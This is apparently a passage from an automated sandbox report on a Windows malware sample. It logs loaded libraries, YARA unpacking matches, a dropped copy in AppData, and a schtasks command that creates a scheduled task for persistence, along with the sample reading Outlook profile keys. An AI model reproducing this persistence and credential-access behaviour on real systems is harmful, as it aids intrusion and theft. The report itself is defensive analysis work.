                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Users\user\Desktop\kzQ25HVUbf.exe "C:\Users\user\Desktop\kzQ25HVUbf.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp851F.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeProcess created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe "C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exe"Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: kzQ25HVUbf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: kzQ25HVUbf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: kzQ25HVUbf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: DJsZ.pdb source: kzQ25HVUbf.exe, iWEWjTXiqXke.exe.0.dr
                Source: Binary string: DJsZ.pdbSHA256p source: kzQ25HVUbf.exe, iWEWjTXiqXke.exe.0.dr

                Data Obfuscation

                barindex
                Source: Yara matchFile source: 0.2.kzQ25HVUbf.exe.3d464e8.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.iWEWjTXiqXke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.kzQ25HVUbf.exe.3cc1d60.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.iWEWjTXiqXke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.kzQ25HVUbf.exe.3d464e8.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1458431204.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1458431204.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.1569686027.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1573168768.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1452870613.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: kzQ25HVUbf.exe PID: 7568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iWEWjTXiqXke.exe PID: 8176, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: iWEWjTXiqXke.exe PID: 616, type: MEMORYSTR
                Source: kzQ25HVUbf.exeStatic PE information: 0xD20BEEF3 [Tue Sep 2 00:10:27 2081 UTC]
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: 18_2_00402AC0 push eax; ret 18_2_00402AD4
                Source: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeCode function: 18_2_00402AC0 push eax; ret 18_2_00402AFC
                Source: kzQ25HVUbf.exeStatic PE information: section name: .text entropy: 7.667730647457407
                Source: iWEWjTXiqXke.exe.0.drStatic PE information: section name: .text entropy: 7.667730647457407
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeFile created: C:\Users\user\AppData\Roaming\iWEWjTXiqXke.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iWEWjTXiqXke" /XML "C:\Users\user\AppData\Local\Temp\tmp53FD.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\kzQ25HVUbf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
